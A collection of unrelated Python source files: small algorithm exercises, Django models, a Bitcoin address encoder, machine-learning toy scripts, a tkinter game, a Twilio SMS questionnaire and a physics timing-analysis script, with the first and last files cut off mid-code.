sym = {"I":1, "V":5, "X":10,"L":50,"C":100,"D":500,"M":1000, "S":10000}
pre="S" #start
stack=[]
for digit in s:
if sym[digit]<=sym[pre]:
stack.append(int(sym[digit]))
elif sym[digit]>sym[pre]:
stack.pop()
stack.append(int(sym[digit]-int(sym[pre])))
pre = digit
return sum(stack)
|
#!/usr/bin/env python3
from lib import digits
max_sum = 0
for a in range(100):
for b in range(100):
s = sum(map(int,digits(a**b)))
if s > max_sum:
max_sum = s
print(a,b,s) |
from django.apps import AppConfig
class JustwriteConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'JustWrite'
|
# !/usr/bin/env python3
"""
This is a script designed to find the longest word in the text file, transpose the letters and show
the result.
"""
import argparse
import concurrent.futures
import logging
import logging.handlers
import os
import re
import sys
from glob import glob
logger = logging.getLogger(os.path.splitext(os.path.basename(sys.argv[0]))[0])
def file_reading(file_path: str) -> list:
"""
The method just reads the text file line by line and saves the result to the list of strings. One line is in
one list element
:param file_path: Path to the file the script needs to read.
:return: the list of strings, extracted from the file.
"""
logger.debug("Current file path: {}".format(file_path))
err_msgs = {'file_format_err': "Error: not supported file format!"}
try:
if not file_path.endswith('.txt'):
print(err_msgs['file_format_err'])
logger.debug(err_msgs['file_format_err'])
sys.exit(1)
with open(file_path, "r") as f:
lines = list(filter(None, (line.rstrip() for line in f)))
return lines
except IOError as e:
logger.exception("%s", e)
sys.exit(1)
def transpose(string_list: list) -> None:
"""
The method finds the longest word, transposes it and prints Original and Transpose words on the screen.
Script exits with code '1' if gets empty list.
If some string has more than one word it would be split into substrings and analyzed separately.
If for some reason the script can not find any word, it prints the appropriate message.
If the list has multiple words with the same length and that length is maximum, first word in the list will be
returned as the longest. There can be multiple ways how to handle that situation (like print all, print some
message, ask the user what should be done) but because there is no info in the description (the bug in the docs :-))
I choose the simplest way.
Output example:
Original: abcde
Transposed: edcba
:param string_list: the list of strings for analisys
:return: None
"""
logger.debug("Got the list for analysis: {}".format(string_list))
max_len_word: str = ''
err_msgs = {"empty_list": "Error: the list of strings is empty!\n",
"empty_string": 'There is only empty strings. Try to use another file.\n'}
if len(string_list) == 0:
print(err_msgs['empty_list'])
logger.debug(err_msgs['empty_list'])
sys.exit(1)
for i in range(len(string_list)):
list_item = string_list[i]
list_item = list_item.strip()
if list_item:
# if we don't use regex we have a problem
# if we use it we have more problems
list_item = re.sub(r'([-])\1+', ' ', list_item)
list_item = list_item.replace(' - ', ' ').replace('- ', ' ').replace(' -', ' ')
list_item = re.sub(r'[^A-Za-z\- _]+', '', list_item)
sub_list_item = list_item.split(' ')
for single_word in sub_list_item:
if single_word:
single_word = single_word.replace(' ', '')
if len(single_word) > len(max_len_word):
max_len_word = single_word
max_len_word_transposed: str = max_len_word[::-1]
if max_len_word_transposed:
conclusion = f"Original: {max_len_word}\nTransposed: {max_len_word_transposed}\n"
else:
conclusion = err_msgs['empty_string']
logger.debug(conclusion)
print(conclusion)
def parse_args(arguments: list):
"""
Parse arguments. Just parse.
:param arguments: the list of arguments, added by the user from CLI
:return: the namespace with arguments and values
"""
parser = argparse.ArgumentParser(description=sys.modules[__name__].__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-f", type=str, help="Path to the file")
parser.add_argument("-p", type=str, help="Path to the folder with multiple files")
g = parser.add_mutually_exclusive_group()
g.add_argument("--debug", "-d", action="store_true", default=False, help="enable debugging mode")
g.add_argument("--silent", "-s", action="store_true", default=False, help="enable silent (only critical) mode")
args_parsed = parser.parse_args(arguments)
if not (args_parsed.f or args_parsed.p):
parser.error('No files requested, add -f file_name or -p path_to_files or --help for more info.')
return args_parsed
def setup_logging(opt) -> None:
"""
Logging configuration.
:param opt: arguments from cli to choose what type of logging, silent/debug/none is active
"""
root = logging.getLogger("")
root.setLevel(logging.WARNING)
logger.setLevel(opt.debug and logging.DEBUG or logging.INFO)
if not opt.silent:
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter("%(levelname)s [%(name)s]: %(message)s"))
root.addHandler(ch)
def main(path: str) -> None:
"""
The main method runs 'file reading' and 'transpose' methods. The entry point.
:param path: path to the file
"""
logger.debug("Working with the words from '{}' file".format(path))
list_of_strings = file_reading(file_path=path)
transpose(string_list=list_of_strings)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
setup_logging(opt=args)
err_msgs = {"path_file": "Error: The path to file was sent! Change to folder path not file path.",
"dir_not_exist": "Error: The directory does not exist"}
if args.f:
main(path=args.f)
else:
if os.path.isfile(args.p):
print(err_msgs['path_file'])
logger.debug(err_msgs['path_file'])
sys.exit(1)
# Get a list of files to process
if not os.path.exists(args.p):
raise OSError(err_msgs['dir_not_exist'])
files = glob(args.p + "/**/*.txt", recursive=True)
# Create a pool of processes. One for each CPU.
with concurrent.futures.ProcessPoolExecutor() as executor:
# Process the list of files, split the work across the process pool to use all CPUs
zip(files, executor.map(main, files))
|
from graph import Graph, Node
import unittest
__author__ = 'nikita'
class TestNode(unittest.TestCase):
def setUp(self):
self.node = Node()
def test_is_last_false(self):
next_node = Node()
self.node.connects.update({50: next_node})
result = self.node.is_last()
self.assertFalse(result)
def test_is_last_true(self):
next_node = Node()
next_node.mark = 50
self.node.connects.update({50: next_node})
result = self.node.is_last()
self.assertTrue(result)
def test_is_last_empty(self):
result = self.node.is_last()
self.assertTrue(result)
def test_add_connect_error(self):
value = 50
method = self.node.add_connect
self.assertRaises(TypeError, method, args=(value, None))
def test_add_connect_ok(self):
value = 50
self.node.add_connect(value, Node())
self.assertTrue(self.node.connects[value])
self.assertTrue(isinstance(self.node.connects[value], Node))
def test_str_ok(self):
self.node.name = 5
string = str(self.node)
self.assertEqual(string, '[5]')
class TestGraph(unittest.TestCase):
def setUp(self):
self.graph = Graph()
def test_fill_nodes_ok(self):
amount = 3
self.graph.fill_nodes(3)
self.assertEqual(len(self.graph.nodes), amount)
for node in self.graph.nodes:
self.assertTrue(isinstance(node, Node))
def test_dejkstra_algorithm_ok(self):
self.graph.fill_nodes(4)
# set connects
self.graph.nodes[0].add_connect(10, self.graph.nodes[1])
self.graph.nodes[1].add_connect(10, self.graph.nodes[2])
self.graph.nodes[0].add_connect(15, self.graph.nodes[2])
initial = self.graph.nodes[0]
self.graph.dejkstra_algorithm(initial)
# check marks
self.assertEqual(self.graph.nodes[0].mark, 0)
self.assertEqual(self.graph.nodes[1].mark, 10)
self.assertEqual(self.graph.nodes[2].mark, 15)
self.assertEqual(self.graph.nodes[3].mark, None)
def test_str_empty(self):
string = str(self.graph)
self.assertEqual(string, '')
def test_str_ok(self):
self.graph.fill_nodes(1)
string = str(self.graph)
self.assertTrue(string)
if __name__ == '__main__':
unittest.main()
|
from smart_pointer_typedef import *
f = Foo()
b = Bar(f)
b.x = 3
if b.getx() != 3:
raise RuntimeError
fp = b.__deref__()
fp.x = 4
if fp.getx() != 4:
raise RuntimeError
|
#coding=utf-8
#print('''
# +----------+
# +-----+ | |RIPEMD160(SHA256(.))结果记为 HASH
# |公钥P| | V
# +-----+ | +----+------+
# | ^ |0x00| HASH | --> SHA256
# V | +----+------+ |
# SHA256 | \ \ V
# | | \ \ SHA256
# V | \记为P_HASH \ |取前4字节记为Check
# RIPEMD160 | \ \ V
# | | +----+------+-----+
# +--->---+ |0x00| HASH |Check| --> BASE58 编码 --> 比特币地址
# +----+------+-----+ 记为 OUT
# 记为 IN
# 比特币地址(钱包地址)生成
# (1)私钥 --> 公钥P=(X,Y)
# 为后续计算方便, 公钥P保存为下列两种16进制格式
# 压缩格式 P = 04 X Y
# 非压缩格式 P = 02/03 X -- 02:Y为偶数 03:Y为奇数
# (2) HASH = RIPEMD160(SHA256(P))
# (3) P_HASH = 0x00 | HASH
# (4) Check = SHA256(SHA256(P_HASH))
# (5) IN = P_HASH | Check
# (6) OUT = BASE58(IN)
#''')
import sys, hashlib
from hashlib import sha256
import binascii as B
if __name__ == '__main__':
if len(sys.argv) != 3:
print('使用方法:', sys.argv[0], 'pub 公钥信息(P=04|X|Y 或 02|X 或 03|X)') # condition 1
print(' ', sys.argv[0], 'pri 私钥信息(P=K)') # condition 3
print(' ', sys.argv[0], 'pri-c 私钥信息(P=K)') # condition 2
print()
print(' ', sys.argv[0], 'hash XXXX -- 由公钥中间值XXXX生成公钥的比特币地址') # condition 4
print(' ', ' '*len(sys.argv[0]), ' 其中, XXXX=RIPEMD160(SHA256(P))')
print()
print('示 例:', sys.argv[0], 'pub 046639E8E50A89C27CB21EA2B3D8E6E39541B92BACBB6CEC1A32E6A0B91D008E7F035AFA91410C69A0309E423027C6FB631F498E07A996FA177DC575F49F251924')
print(' ', ' '*len(sys.argv[0]),' | ---------------------------- X ----------------------------- || ---------------------------- Y ----------------------------- |')
print()
print(' ', sys.argv[0], 'pub 0202a406624211f2abbdc68da3df929f938c3399dd79fac1b51b0e4ad1d26a47aa # 公钥:压缩格式')
print(' ', ' '*len(sys.argv[0]),' | ---------------------------- X ----------------------------- |')
print()
print(' ', sys.argv[0], 'pri B5A948BD1650CB7FA30E5E820B54265E4963CF6591AE7CCE5F4EE8D1BA62132C # 私钥:WIF 未压缩格式')
print(' ', ' '*len(sys.argv[0]),' | ---------------------------- K ----------------------------- |')
print()
print(' ', sys.argv[0], 'pri-c B5A948BD1650CB7FA30E5E820B54265E4963CF6591AE7CCE5F4EE8D1BA62132C # 私钥:WIF 压缩格式')
print(' ', ' '*len(sys.argv[0]),' | ---------------------------- K ----------------------------- |')
exit()
if sys.argv[1].startswith('pub') :
key_flag = 1
elif sys.argv[1].startswith('pri-c') :
key_flag = 2
elif sys.argv[1].startswith('hash') :
key_flag = 4
else :
key_flag = 3
if key_flag != 4 :
Key = B.a2b_hex(sys.argv[2])
temp = hashlib.new('sha256', Key).digest()
HASH = hashlib.new('ripemd160', temp).digest()
bytes = B.b2a_hex(temp)
print('Sha256(Key) :', str(bytes)[2:-1])
bytes = B.b2a_hex(HASH)
print('HASH: ', str(bytes)[2:-1], " -- HASH = Ripemd160(Sha256(Key))")
else :
HASH = B.a2b_hex(sys.argv[2])
bytes = B.b2a_hex(HASH)
print('HASH: ', str(bytes)[2:-1], " -- HASH = Ripemd160(Sha256(Key))")
if key_flag == 1 or key_flag == 4 :
P_HASH = b'\x00' + HASH
bytes = B.b2a_hex(P_HASH)
print('P_HASH: ', str(bytes)[2:-1], ' -- P_HASH = 0x00 | HASH')
elif key_flag == 3 :
P_HASH = b'\x80' + Key
# Add a 0x80 byte in front of it for mainnet addresses
bytes = B.b2a_hex(P_HASH)
print('P_HASH:', str(bytes)[2:-1], '-- P_HASH = 0x80 | Prikey')
elif key_flag == 2:
P_HASH = b'\x80' + Key + b'\x01'
# Add a 0x80 byte in front of it for mainnet addresses
# Also add a 0x01 byte at the end if the private key will correspond to a compressed public key
bytes = B.b2a_hex(P_HASH)
print('P_HASH:', str(bytes)[2:-1], '-- P_HASH = 0x80 | Prikey | 0x01')
temp = hashlib.new('sha256', P_HASH).digest()
Check = hashlib.new('sha256', temp).digest()
bytes = B.b2a_hex(Check)
print('Check: ', str(bytes)[2:10], '-- Check = SHA256(SHA256(P_HASH))[0:4]')
temp = P_HASH + Check[0:4]
bytes = B.b2a_hex(temp)
print('BASE58_IN: ', str(bytes)[2:-1])
# base58 encode
# code_string = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# x = convert_bytes_to_big_integer(BASE58_IN)
# output_string = ""
# while(x > 0)
# {
# (x, remainder) = divide(x, 58)
# output_string.append(code_string[remainder])
# }
# repeat(number_of_leading_zero_bytes_in_hash)
# {
# output_string.append(code_string[0]);
# }
# output_string.reverse();
# 核心:将 BASE58_IN 看作一个大整数,表示成以58为基数的数
code_string = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
x = int(str(bytes)[2:-1], 16)
output_string = ''
while(x > 0) :
(x, remainder) = divmod(x, 58)
output_string = output_string + code_string[remainder]
if key_flag == 1 :
print('BASE58_OUT:', '1'+output_string[::-1])
elif key_flag == 2 :
print('BASE58_OUT:', output_string[::-1], '-- WIF-compressed')
else :
print('BASE58_OUT:', output_string[::-1], '-- WIF') |
'''
94. Binary Tree Inorder Traversal
Given a binary tree, return the inorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,3,2]
Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Solution -1 Iterative
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
if root == None: return []
_inorder = []
stack = []
curr = root
while curr != None or len(stack) > 0:
while curr != None:
stack.append(curr)
curr = curr.left
curr = stack.pop()
_inorder.append(curr.val)
curr = curr.right
return _inorder
# Solution-2 Recurrsive
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
_inorder = []
def inorder(root):
if root == None: return
inorder(root.left)
_inorder.append(root.val)
inorder(root.right)
inorder(root)
return _inorder
# Solution - 3 Threaded Binary Approach
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
_inorder = []
curr = root
while curr != None:
if curr.left == None:
_inorder.append(curr.val)
curr= curr.right
else:
prev = curr.left
while prev.right != None:
prev=prev.right
prev.right = curr
tmp = curr
curr= curr.left
tmp.left = None
return _inorder
# Solution -4 Threaded Binary (Morris Traversal)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def inorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
_inorder = []
curr = root
while curr != None:
if curr.left == None:
_inorder.append(curr.val)
curr= curr.right
else:
prev = curr.left
while prev.right != None:
prev=prev.right
prev.right = curr
curr = prev.right.left
prev.right.left = None
return _inorder
|
'''
#Obtenemos el historial de datos de una unidad
response = dashboard.sm.getNetworkSmDeviceCellularUsageHistory(
network_id,
device_id
)
'''
'''
#Obtenemos el historial de conectividad del telefono
response = dashboard.sm.getNetworkSmDeviceConnectivity(
network_id,
device_id,
total_pages='all',
direction='next'
)
'''
'''
###Eliminar un elemento del diccionario###
car = {
"a" : 1,
"b" : 2,
"c" : 3,
"d" : 4
}
print(car)
car.pop("c")
car_json = json.dumps(car,indent=4)
print(car_json)
'''
'''
#Insertar datos en la base de datos
from pydatabase import conexion
try:
with conexion.cursor() as cursor:
consulta = "INSERT INTO peliculas(titulo, anio) VALUES (?, ?);"
# Podemos llamar muchas veces a .execute con datos distintos
cursor.execute(consulta, ("Volver al futuro 1", 1985))
cursor.execute(consulta, ("Pulp Fiction", 1994))
cursor.execute(consulta, ("It", 2017))
cursor.execute(consulta, ("Ready Player One", 2018))
cursor.execute(consulta, ("Spider-Man: un nuevo universo", 2018))
cursor.execute(consulta, ("Avengers: Endgame", 2019))
cursor.execute(consulta, ("John Wick 3: Parabellum", 2019))
cursor.execute(consulta, ("Toy Story 4", 2019))
cursor.execute(consulta, ("It 2", 2019))
cursor.execute(consulta, ("Spider-Man: lejos de casa", 2019))
except Exception as e:
print("Ocurrió un error al insertar: ", e)
finally:
conexion.close()
'''
'''
#Insertar varias columnas al mismo tiempo
from pydatabase import conexion
try:
with conexion.cursor() as cursor:
query = "INSERT INTO peliculas(titulo,anio) VALUES(?, ?)"
valores = [
('TEST', 123),
('TEST2', 12),
('TEST3', 987),
]
cursor.executemany(query, valores)
conexion.commit()
print("Se inserto con exito")
except Exception as e:
print("Error al ingresar datos: ",e)
finally:
conexion.close()
'''
# Insertar informacion desde un dict
# from pydatabase import conexion
# try:
# with conexion.cursor() as cursor:
# valores = [
# {
# 'titulo': 'ff',
# 'anio': 1999
# },
# {
# 'titulo': 'fffff',
# 'anio': 7854
# }
# ]
# #print(valores)
# for dict in valores:
# values = ', '.join("'" + str(x).replace('/', '_') + "'" for x in dict.values())
# sql = "INSERT INTO %s (titulo,anio) VALUES ( %s );" % ('peliculas', values)
# print(sql)
# cursor.execute(sql)
# cursor.commit()
# print("Se ingreso con exito")
# except Exception as e:
# print("Error al ingresar datos: ",e)
# finally:
# conexion.close()
# Combinar dos dicts
# dict1 = [
# {
# 'Titulo': 'Juano',
# 'Edad': 23
# },
# {
# 'Titulo': 'Banano',
# 'Edad': 20
# }
#
# ]
# dict2 = [
# {
# 'Direccion': 'EDOMEX',
# 'Telefono': 5521190023
# },
# {
# 'Direccion': 'CDMX',
# 'Telefono': 5514691810
# }
# ]
# for key in dict1:
# for key2 in dict2:
# key.update(key2)
# print(key)
#Fechas con Python
# from datetime import datetime
#
# date = {
# 'received_on': str(datetime.now())
# }
# print(date)
# Sustituir un valor de un key
# response_data = [
# {
# 'received': 7156,
# 'sent': 2081,
# 'ts': '2020-10-28T00:00:00.000000Z'
# },
# {'received': None, 'sent': None, 'ts': '2020-10-29T00:00:00.000000Z'},
# {'received': 1010, 'sent': 288, 'ts': '2020-10-30T00:00:00.000000Z'},
# {'received': 540, 'sent': None, 'ts': '2020-11-04T00:00:00.000000Z'},
# {'received': 18742, 'sent': None, 'ts': '2020-11-05T00:00:00.000000Z'}
# ]
# for i in response_data:
# if i['received'] == None:
# i.update(received='null')
# if i['sent'] == None:
# i.update(sent='null')
#
# print(i)
# Timestamp to datetime
# from datetime import datetime
# timestamp = 1606190465
# new_date = datetime.fromtimestamp(timestamp)
# print(new_date)
# Local time to UTC time
# import pytz, datetime
# local = pytz.timezone("America/Los_Angeles")
# naive = datetime.datetime.strptime("2001-2-3 10:11:12", "%Y-%m-%d %H:%M:%S")
# local_dt = local.localize(naive, is_dst=None)
# utc_dt = local_dt.astimezone(pytz.utc)
# print(utc_dt)
#Prueba de cambio de formato de fechas a UTC
from datetime import datetime
import pytz
response = [
{
'id': '584342051651885713',
'batteryEstCharge': '85',
'lastConnected': 1606192497,
'cellularDataUsed': 6457,
'location': 'Dr. R. Michel 1310, Mirador',
'Received_On': '2020-11-23 22:15:33.047195'
},
{
'id': '584342051651885713',
'batteryEstCharge': '85',
'lastConnected': 1606192497,
'cellularDataUsed': 6457,
'location': 'Dr. R. Michel 1310, Mirador',
'Received_On': '2020-11-23 22:15:33.047195'
}
]
for key in response:
# Cambiamos formato de campo lastConnected a datetime
timestamp = key['lastConnected']
new_date = datetime.fromtimestamp(timestamp)
stamp_utc = new_date.astimezone(pytz.utc)
key.update(lastConnected=stamp_utc)
print(key)
|
from sklearn import tree
#features =[[140, "smooth"], [130,"smooth"], [150, "bumpy"], [170, "bumpy"]]
#lables = ["apple", "apple", "orange", "orange"]
# 1 :- smooth & 0 :- bumpy
# 0 :- apple & 1 :- orange
features =[[140, 1], [130, 1], [150, 0], [170, 0]]
lables = [0 , 0, 1, 1]
clf = tree.DecisionTreeClassifier()
clf = clf.fit(features, lables)
print clf.predict([[150, 0]])
|
# make a table of ASCII values of upper and lower-case alphabet
# fileU.txt = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# fileL.txt = 'abcdefghijklmnopqrstuvwxyz'
file = open("fileL.txt")
while 1:
char = file.read(1)
if not char:
break
for i in char:
print(i,":\t",ord(char))
|
import os
import re
import time
import pickle
import pyprind
import joblib
import numpy as np
import emoji
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
from nltk.corpus import stopwords
stop = stopwords.words('english')
def tokenizer(text):
text= re.sub('<[^>]*>','',text)
text = re.sub('[^a-zA-Z0-9]',' ',text)
text= re.sub('[\W+]','',text.lower())
tokenized = [w for w in text.split() if w not in stop]
return tokenized
def stream_docs(path):
with open(path,'r',encoding='utf-8') as csv:
next(csv)
for line in csv:
text,label = line[:-3],line[-2]
yield text,label
def get_minibatch(doc_stream,size):
docs,y = [],[]
try:
for _ in range(size):
text,label = next(doc_stream)
docs.append(text)
y.append(label)
except Exception as e:
print(str(e))
return docs,y
vect = HashingVectorizer(decode_error='ignore',n_features=2**21,preprocessor=None,tokenizer=tokenizer)
clf = SGDClassifier(loss='log',random_state=1,max_iter=1)
doc_stream = stream_docs('movie_data.csv')
pbar = pyprind.ProgBar(45)
classes = np.array([0,1])
for _ in range(45):
xtrain,ytrain = get_minibatch(doc_stream,size=1000)
if not xtrain:
break
xtrain = vect.transform(xtrain)
clf.partial_fit(xtrain,ytrain,classes=np.array(list(set(ytrain))))
pbar.update()
xtest,ytest = get_minibatch(doc_stream,size=5000)
xtest = vect.transform(xtest)
print(clf.score(xtest,ytest))
clf.partial_fit(xtest,ytest)
joblib.dump(clf,'classifier.joblib')
joblib.dump(stop,'stopword.joblib')
|
# Programmer - python_scripts (Abhijith Warrier)
# PYTHON GUI GAME WHERE THE PLAYER HAS TO ENTER THE COLOR IN WHICH TEXT IS WRITTEN
# Importing necessary packages
import random
import tkinter as tk
from tkinter import *
from tkinter import messagebox
# Declaring global variables
timeleft = 60 # Setting timeleft variable to 60 seconds
score = 0
# Defining a function to create widgets for the game
def CreateWidgets():
instLabel = Label(root, text="ENTER COLOR OF THE TEXT", font=('Helvetica',30), background='azure4')
instLabel.grid(row = 0, column = 0, columnspan = 3, padx=5, pady=15)
startButton = Button(root, text="START GAME", width=20, font=('Helvetica',15), command=StartGame,
background='azure4')
startButton.grid(row = 1, column = 0,padx = 5,pady = 15, columnspan = 3 )
root.timeLabel = Label(root, text="TIME LEFT : ", font=('Helvetica',30), background='azure4')
root.timeLabel.grid(row=2, column=0, padx=5, pady=15)
root.scoreLabel = Label(root, text="SCORE : "+str(score), font=('Helvetica',30), background='azure4')
root.scoreLabel.grid(row=2, column=1, padx=5, pady=15)
root.gameLabel = Label(root, font=('Comic Sans MS',60), background='azure4')
root.gameLabel.grid(row=3, column=0, padx=5, pady=15, columnspan=2)
root.answerEntry = Entry(root, width=20, font=30, background='SILVER', textvariable=colorText)
root.answerEntry.grid(row=4, column=0, padx=5, pady=15, columnspan=2)
root.answerEntry.focus()
# Defining function to start the game
def StartGame():
# Calling the above declared global variables
global timeleft, score
# Checking if the timeleft is greater than 0. If yes do the following
if timeleft > 0:
# Decrementing the timeleft by 1
timeleft -= 1
# Displaying the time left in above created label for time left
root.timeLabel.config(text="TIME LEFT : " + str(timeleft))
# Creating a list of random colors
randomColor = ['RED', 'GREEN', 'BLUE', 'VIOLET', 'PINK', 'BROWN', 'BLACK', 'WHITE']
# Shuffling the list
random.shuffle(randomColor)
# Selecting two colors from the shuffled randomColor list and setting
# One Color as Label Text and the Other Color as Font Color of the text
root.gameLabel.config(text=str(randomColor[0]), fg=randomColor[1])
# Check if the user's input is equal to the Font Color of the text
if colorText.get().lower() == randomColor[1].lower():
#If yes increment the score value by 1
score += 1
# Displaying the score
root.scoreLabel.config(text = "SCORE : "+str(score))
# Clearing the user's entry
root.answerEntry.delete(0, END)
# Calling the StartGame function again after 1 second
root.timeLabel.after(1000, StartGame)
# If timeleft is equal to 0, then stop the game and display the users's score
else:
messagebox.showinfo("TIME UP !","YOUR SCORE IS : "+str(score))
# Creating object of tk class
root = tk.Tk()
# Creating tkinter variable
colorText = StringVar()
# Setting the title and background color
# disabling the resizing property
root.title("PythonTextColorGame")
root.configure(background='azure4')
root.resizable(False, False)
# Calling the CreateWidgets() function
CreateWidgets()
# Defining infinite loop to run application
root.mainloop()
|
from django.db import models
from django.utils import timezone
from django.urls import reverse
from django.utils.html import strip_tags
import markdown
from users.models import MyUser
# Create your models here.
class Category(models.Model):
name = models.CharField('类别名称', max_length=100)
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Tag(models.Model):
name = models.CharField('标签名称', max_length=100)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Post(models.Model):
title = models.CharField('标题', max_length=70)
body = models.TextField('正文')
created_time = models.DateTimeField('创建时间', default=timezone.now)
modified_time = models.DateTimeField('修改时间')
excerpt = models.CharField('摘要', max_length=200, blank=True)
category = models.ForeignKey(Category, verbose_name='分类', on_delete=models.CASCADE)
tags = models.ManyToManyField(Tag, verbose_name='标签', blank=True)
author = models.ForeignKey(MyUser, verbose_name='作者', on_delete=models.CASCADE)
views = models.PositiveIntegerField('阅读量', default=0, editable=False) # 正整数
class Meta:
verbose_name = '文章' # 指定对应的 model 在 admin 后台的显示名称
verbose_name_plural = verbose_name # 表示复数,中文没有复数表现形式,所以和上面一样
ordering = ['-created_time']
def save(self, *args, **kwargs):
self.modified_time = timezone.now()
md = markdown.Markdown(extensions=[
'markdown.extensions.extra',
'markdown.extensions.codehilite',
])
self.excerpt = strip_tags(md.convert(self.body))[:54] if self.excerpt.strip() == '' else self.excerpt
super().save(*args, **kwargs)
def increase_views(self):
self.views += 1
self.save(update_fields=['views']) # 更新数据库中的views字段
def get_absolute_url(self):
return reverse('petblog:detail', kwargs={'pk': self.pk})
def __str__(self):
return self.title
class Comment(models.Model):
text = models.TextField('内容')
created_time = models.DateTimeField('创建时间', default=timezone.now)
user = models.ForeignKey(MyUser, verbose_name='用户', on_delete=models.CASCADE)
post = models.ForeignKey('petblog.Post', verbose_name='文章', on_delete=models.CASCADE)
class Meta:
verbose_name = '评论'
verbose_name_plural = verbose_name
def __str__(self):
return f'{self.user}:{self.text[:20]}'
|
from flask import Flask, request, redirect
from twilio.twiml.messaging_response import MessagingResponse
app = Flask(__name__)
user_info = dict()
@app.route("/handle_sms", methods=['GET', 'POST'])
def incoming_sms():
"""Send a dynamic reply to an incoming text message"""
# Get the message the user sent our Twilio number
body = request.values.get('Body', None)
# Start our TwiML response
resp = MessagingResponse()
phone_number = request.values.get('From')
if phone_number in user_info:
if user_info[phone_number][-1] == 0:
#check the validity of the state
user_info[phone_number][0] = body
resp.message('How old are you? Selection from the age groups below:')
resp.message('A. 3 to 17')
resp.message('B. 18 to 30')
resp.message('C. 31 to 64')
resp.message('D. 65 and older')
user_info[phone_number][-1] += 1
elif user_info[phone_number][-1] == 1:
#check the validity of the age
user_info[phone_number][1] = body
resp.message('What profession are you?')
resp.message('Are you in Group A? (Yes / No)')
resp.message('Ambulatory health care \n Assisted living \n Developmental disability facility \n Fire protection services \n Home healthcare services Hospital '
'worker \n Nursing/residential care \n Outpatient care \n Pharmacy/drug store \n Physician/health practitioner \n Police')
user_info[phone_number][-1] += 1
elif user_info[phone_number][-1] == 2:
#check the validity of the profession
user_info[phone_number][2] = body
resp.message('What is your living situation?')
resp.message(
'A. Nursing home/residential care \n B. Home with more people than rooms \n C. Homeless shelter '
'\n D. Prison/Jail \n E. Group home \n F. Rehab center \n G. None of these')
user_info[phone_number][-1] += 1
elif user_info[phone_number][-1] == 3:
#check the validity of the living condition
user_info[phone_number][3] = body
resp.message('Do you have any health conditions?')
resp.message('A. Obesity \n B. COPD (Chronic obstructive pulmonary disease) \n C. Diabetes \n D. Heart disease \n E. Chronic kidney disease \n F. None of these')
user_info[phone_number][-1] += 1
elif user_info[phone_number][-1] == 4:
#check the validity of the health condition
user_info[phone_number][4] = body
resp.message('This is the end of the message.')
else:
resp.message('Hi! Welcome to Vaccine Info Estimator, we are going to ask you a series of questions to determine'
'your estimated date to receive the vaccine. What state are you in?')
current_counter = 0
user_info[phone_number] = [None, None, None, None, None, current_counter]
print(user_info)
#----------------------------------------------------------------------------
return str(resp)
if __name__ == "__main__":
app.run(debug=True)
# twilio phone-numbers:update PNe2a30ea94813c69a9856573f9a7e3b7d --sms-url http://localhost:5000/handle_sms
# from flask import Flask, request, redirect
# from twilio.twiml.messaging_response import MessagingResponse
#
# app = Flask(__name__)
#
# @app.route("/handle_sms", methods=['GET', 'POST'])
# def incoming_sms():
# """Send a dynamic reply to an incoming text message"""
# # Get the message the user sent our Twilio number
# body = request.values.get('Body', None)
#
# # Start our TwiML response
# resp = MessagingResponse()
#
# # Determine the right reply for this message
# if body:
# resp.message('Hi! Welcome to Vaccine Info Estimator, we are going to ask you a series of questions to determine'
# 'your estimated date to receive the vaccine.')
#
#
# return str(resp)
#
# if __name__ == "__main__":
# app.run(debug=True) |
import ROOT
import numpy as np
import itertools as it
import data_management as dm
import run_log_metadata as md
ROOT.gROOT.SetBatch(True)
# The function imports pulse files and creates timing resolution files with
# time differences used for timingPlots and trackingAnalysis.
def createTimingFiles(batchNumber):
runNumbers = md.getAllRunNumbers(batchNumber)
startTimeBatch = dm.getTime()
print "\nBatch:", batchNumber, len(runNumbers), "run files.\n"
for runNumber in runNumbers:
md.defineRunInfo(md.getRowForRunNumber(runNumber))
if not dm.checkIfFileAvailable("timing"):
continue
print "Run", runNumber, "\n"
# Import files per run
peak_time = dm.exportImportROOTData("pulse", "peak_time")
cfd = dm.exportImportROOTData("pulse", "cfd")
# Perform linear calculations
time_diff_peak = getTimeDifferencePerRun(peak_time)
time_diff_cfd = getTimeDifferencePerRun(cfd)
# Export per run number linear
dm.exportImportROOTData("timing", "normal_peak", time_diff_peak)
dm.exportImportROOTData("timing", "normal_cfd", time_diff_cfd)
if batchNumber/100 != 6:
# Perform calculations sys eq
time_diff_peak_sys_eq = getTimeDifferencePerRunSysEq(peak_time)
time_diff_cfd_sys_eq = getTimeDifferencePerRunSysEq(cfd)
# Export per run number sys eq
dm.exportImportROOTData("timing", "system_peak", time_diff_peak_sys_eq)
dm.exportImportROOTData("timing", "system_cfd", time_diff_cfd_sys_eq)
print "Done with run", runNumber, "\n"
print "Done with batch", batchNumber, "Time analysing: "+str(dm.getTime()-startTimeBatch)+"\n"
# This takes the time difference between a DUT and the SiPM.
def getTimeDifferencePerRun(time_location):
